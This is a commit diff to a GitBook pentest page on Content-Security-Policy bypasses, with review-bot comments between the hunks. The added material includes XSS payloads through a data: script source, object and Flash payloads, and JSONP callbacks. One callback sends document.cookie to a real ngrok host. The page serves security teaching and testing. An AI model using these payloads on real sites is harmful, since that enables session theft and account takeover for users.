GitBook: [#3634] No subject
This commit is contained in:
parent
69ae5653b7
commit
542406d1b2
@ -128,6 +128,18 @@ Working payload:
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Whitelisted data:
```yaml
Content-Security-Policy: script-src data: ;
```
Working payload:
```html
<script src=data:text/javascript,alert(1337)></script>
```
### Lack of object-src and default-src
{% hint style="danger" %}
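Review bot: The new `Whitelisted data:` section shows the policy and the payload but no sentence saying why the policy fails, which is what a reader needs: listing `data:` in `script-src` lets a page that reflects attacker input load a script from a URI the attacker fully controls, so it is equivalent to permitting inline script, and the fix is to remove `data:` from `script-src` (and from `default-src`). Two smaller points: the policy block is fenced with the yaml tag although it is an HTTP response header, and the payload block uses the html tag while the rest of the page uses markup; the heading also carries a trailing colon that the neighbouring `### Lack of object-src and default-src` heading does not.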
@ -142,7 +154,7 @@ Working payloads:
```markup
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
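Review bot: The replaced line only drops the stray space in `https: //`, but the path segment `2.8.0 r4` in both the old and the new line still contains a space, so the URL would not resolve as written; check whether it should be `2.8.0r4` (the YUI release naming) and fix it in the same change. It is also worth noting in the text that the two `application/x-shockwave-flash` entries depend on a Flash plugin that current browsers no longer ship, so labelling them as legacy would stop readers expecting them to work under the `Working payloads:` heading.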
@ -206,9 +218,10 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>
```
[JSONBee](https://github.com/zigoo0/JSONBee) contains ready to use JSONP endpoints to CSP bypass of different websites.
****[**JSONBee**](https://github.com/zigoo0/JSONBee) **** contains **ready to use JSONP endpoints** to CSP bypass of different websites.
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
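Review bot: The bolded replacement line carries empty `****` markers on both sides of the link (`****[**JSONBee**](...) ****`), which render as stray asterisks; drop them and keep `[**JSONBee**](...)`. The sentence also reads better as "contains ready-to-use JSONP endpoints to bypass the CSP of different websites". Separately, the second new payload hard-codes a specific ngrok hostname; a placeholder such as `attacker.example` would avoid pointing readers at a real host that may since have been reassigned.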
@ -525,6 +538,7 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
* [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
* [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
* [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
* [https://www.cobalt.io/blog/csp-and-bypasses](https://www.cobalt.io/blog/csp-and-bypasses)
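Review bot: The four new reference entries are bare URLs with no description, unlike the `Example:` line in the hunk header, which says what it points at; a few words per link naming the bypass technique each one covers would make the list usable. The 0xn3va link targets the `#allowed-data-scheme` anchor that backs the `Whitelisted data` section added earlier in this commit, so consider citing it inline there as well rather than only in the reference list.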